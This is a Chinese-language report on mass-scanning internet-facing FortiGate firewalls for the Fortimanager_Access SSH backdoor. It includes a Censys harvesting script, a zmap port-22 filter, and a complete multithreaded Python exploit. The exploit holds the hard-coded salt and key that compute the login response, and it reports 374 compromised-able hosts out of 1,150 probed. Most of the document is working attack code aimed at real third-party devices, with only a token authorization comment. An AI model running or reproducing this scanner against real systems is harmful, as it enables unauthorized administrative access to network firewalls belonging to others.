飞塔（Fortinet FortiGate）SSH 后门 —— 4900 台机器样本测试报告
测试过程 1. Censys 拉取数据：通过 Censys 拉取了 49 页（脚本中为 range(1, 50)，合计 4900 条）搜索结果，所用查询为
[*]443.https.tls.certificate.parsed.subject.organizational_unit: FortiGate
关键字（即 HTTPS 证书主题 OU 字段为 FortiGate 的主机）。
使用官方 API 进行拉取（需先配置 Censys 的 API ID / Secret），脚本如下:
import json
import os
import sys

import requests
[*]
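API_URL = "https://www.censys.io/api/v1"
# Censys API credentials are read from the environment so they are never
# committed or pasted into a published report.  The "0" fallback is the
# original placeholder; the API will simply reject it if nothing is set.
UID = os.environ.get("CENSYS_UID", "0")
SECRET = os.environ.get("CENSYS_SECRET", "0")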
[*]
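def get(page):
    """Fetch one page of Censys IPv4 search results and print each IP.

    Queries the v1 ``/search/ipv4`` endpoint for hosts whose HTTPS
    certificate subject OU is "FortiGate" and prints one IP per line, so
    the output can be redirected straight into ``ip.txt`` for the zmap
    step.  (The v1 search API used here has since been superseded by v2 —
    check before reusing this.)

    Args:
        page: 1-based results page number.

    Raises:
        requests.HTTPError: on a non-2xx response (bad credentials, rate
            limiting, page past the end of the result set).
        ValueError: if the response body is not valid JSON.
    """
    payload = {
        "query": "443.https.tls.certificate.parsed.subject.organizational_unit: FortiGate",
        "page": int(page),
        # Only the address is needed downstream.
        "fields": ["ip"],
    }

    # The body is JSON, so say so; a timeout keeps one stalled connection
    # from hanging the whole pull.
    res = requests.post(
        API_URL + "/search/ipv4",
        data=json.dumps(payload),
        headers={"Content-Type": "application/json"},
        auth=(UID, SECRET),
        timeout=30,
    )
    res.raise_for_status()
    results = res.json()

    # An error body has no "results" key; treat it as an empty page rather
    # than dying with a KeyError.
    for result in results.get("results", []):
        print("%s" % (result["ip"],))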
# Pages are 1-based; this stops after page 49, which is the pull that
# produced the 4900 addresses counted in the report below.
for page_number in range(1, 50):
    get(page_number)
2. 筛选出开放 22 端口的 IP。原始数据长度:
[*][root@xunzh 8]# cat ip.txt |wc
[*] 4900 4900 74466
[*][root@xunzh 8]#
通过 zmap 对这些 IP 做 TCP/22 的 SYN 扫描筛选，只保留端口开放的主机
# Keep only the Censys hits that answer on TCP/22; out.txt feeds the SSH probe.
# --whitelist-file is the legacy name of the target-list option (recent zmap
# releases renamed it --allowlist-file).
zmap --target-port=22 --whitelist-file=ip.txt --output-file=out.txt
最终剩下（22 端口对公网开放的主机）:
[*][root@xunzh 8]# cat out.txt |wc
[*] 1150 1150 16323
3. 对其进行扫描：在原始 PoC 测试脚本的基础上修改，添加多线程模块后进行批量测试。
[*]#!/usr/bin/env python
[*]
# SSH backdoor check for FortiGate OS 4.x up to 5.0.7 (hard-coded
# "Fortimanager_Access" keyboard-interactive login; see custom_handler).
# Usage: python scan.py <file with one target IP per line>
#   (the single-target original was: ./fgt_ssh_backdoor.py <target-ip>)
# Only run this against devices you are authorized to test.
[*]import threading
[*]import Queue
[*]import socket
[*]import select
[*]import sys
[*]import paramiko
[*]from paramiko.py3compat import u
[*]import base64
[*]import hashlib
[*]import termios
[*]import tty
[*]
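def custom_handler(title, instructions, prompt_list):
    """paramiko keyboard-interactive handler answering the FortiOS challenge.

    The device sends a challenge string as its single prompt; the accepted
    answer is ``"AK1" + base64(12 zero bytes || SHA1(12 zero bytes ||
    challenge || fixed salt || fixed 24-byte key))``.  Both constants are
    baked into the affected firmware, so anyone holding them can log in as
    ``Fortimanager_Access`` without a password (publicly tracked as
    CVE-2016-1909 / Fortinet FG-IR-16-001 — confirm against the advisory).

    Args:
        title: unused; supplied by paramiko.
        instructions: unused; supplied by paramiko.
        prompt_list: list of ``(prompt, echo)`` tuples from the server; only
            the first prompt is used, as the challenge.

    Returns:
        A one-element list holding the response string, as paramiko expects.
    """
    challenge = prompt_list[0][0]
    # Hash over bytes so this works on both Python 2 (str is bytes) and 3.
    if not isinstance(challenge, bytes):
        challenge = challenge.encode("utf-8")

    digest = hashlib.sha1()
    digest.update(b"\x00" * 12)
    digest.update(challenge + b"FGTAbc11*xy+Qqz27")
    digest.update(
        b"\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1"
        b"\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70"
    )

    token = base64.b64encode(b"\x00" * 12 + digest.digest())
    if not isinstance(token, str):  # Python 3: b64encode returns bytes
        token = token.decode("ascii")
    return ["AK1" + token]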
[*]
[*]
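def main(ip):
    """Probe one host for the FortiOS ``Fortimanager_Access`` SSH backdoor.

    Runs the same sequence as the original PoC — a credential-less connect to
    bring up a transport, an (expected-to-fail) empty-password attempt, then
    keyboard-interactive authentication answered by ``custom_handler`` — and
    prints ``<ip> ok`` once the transport reports itself authenticated.

    The interactive shell loop of the original PoC is deliberately gone: a
    batch scanner has no terminal to hand over, and putting the shared
    ``sys.stdin`` into raw mode from ten threads at once (or on a non-tty
    stdin, where ``tcgetattr`` simply raises) made every probe fail silently.

    Args:
        ip: target address; port 22 is assumed (the zmap pre-filter was TCP/22).

    Returns:
        True if the backdoor login was accepted, False otherwise.

    Raises:
        socket.error, socket.timeout, paramiko.SSHException: network or
            protocol failures, including a rejected interactive login.  The
            worker thread treats all of these as "not ok".
    """
    client = paramiko.SSHClient()
    # Mass scan: host keys are unknown and irrelevant here, so accept them.
    # Do not copy this policy into anything that sends real credentials.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        try:
            client.connect(ip, username='', allow_agent=False, look_for_keys=False,
                           timeout=10, banner_timeout=10)
        except paramiko.ssh_exception.SSHException:
            # Expected: no credentials were supplied, so paramiko gives up
            # after key exchange and leaves an active, unauthenticated
            # transport behind — which is all we need.
            pass

        trans = client.get_transport()
        if trans is None or not trans.is_active():
            return False

        try:
            trans.auth_password(username='Fortimanager_Access', password='',
                                event=None, fallback=True)
        except paramiko.ssh_exception.AuthenticationException:
            pass

        if not trans.is_authenticated():
            # Raises AuthenticationException if the device is not backdoored.
            trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)

        if trans.is_authenticated():
            print(ip + " ok \n")
            return True
        return False
    finally:
        # Always release the socket; the original leaked one per target.
        client.close()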
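# Targets: one IP per line.  strip() also drops '\r' from Windows line ends,
# and skipping empty lines stops a trailing newline from enqueuing '' as a host.
with open(sys.argv[1]) as target_file:
    ips = [line.strip() for line in target_file if line.strip()]
q = Queue.Queue()
for i in ips:
    # One address per queue item (the original put the whole list in each time).
    q.put(i)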
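class mm(threading.Thread):
    """Worker that drains the shared target queue, probing one host at a time.

    Args:
        queue: ``Queue.Queue`` of target IPs.  The script fills it completely
            before starting any worker, so "queue empty" means "all done".
    """

    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.q = queue

    def run(self):
        """Probe targets until the queue is empty, then return.

        The original blocked on ``get()`` forever, so the process never
        exited once every target had been consumed.  Errors raised by
        ``main`` (refused connections, timeouts, rejected logins) mean
        "unreachable / not vulnerable" and are intentionally ignored, but
        only ``Exception`` is caught so Ctrl-C still stops the scan.
        """
        while True:
            try:
                line = self.q.get_nowait()
            except Queue.Empty:
                return
            try:
                main(line)
            except Exception:
                pass
            finally:
                self.q.task_done()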
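# Ten concurrent probes.  Keep handles to the workers and wait on them so the
# main thread does not return while probes are still in flight.
workers = [mm(q) for _ in range(10)]
for worker in workers:
    worker.start()
for worker in workers:
    worker.join()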
使用方法:
[*]python scan.py input.txt
4. 总结：扫描结果显示存在 374 台漏洞机器，约占原始 4900 条样本的十三分之一（在 1150 台开放 22 端口的主机中约占三分之一）。按此比例推算，全网大约有 5000 台以上机器受到影响；需要注意这只是基于 49 页 Censys 样本的粗略估算，且只覆盖 SSH 对公网开放的设备。将漏洞主机标注在地图上，结果大致如下: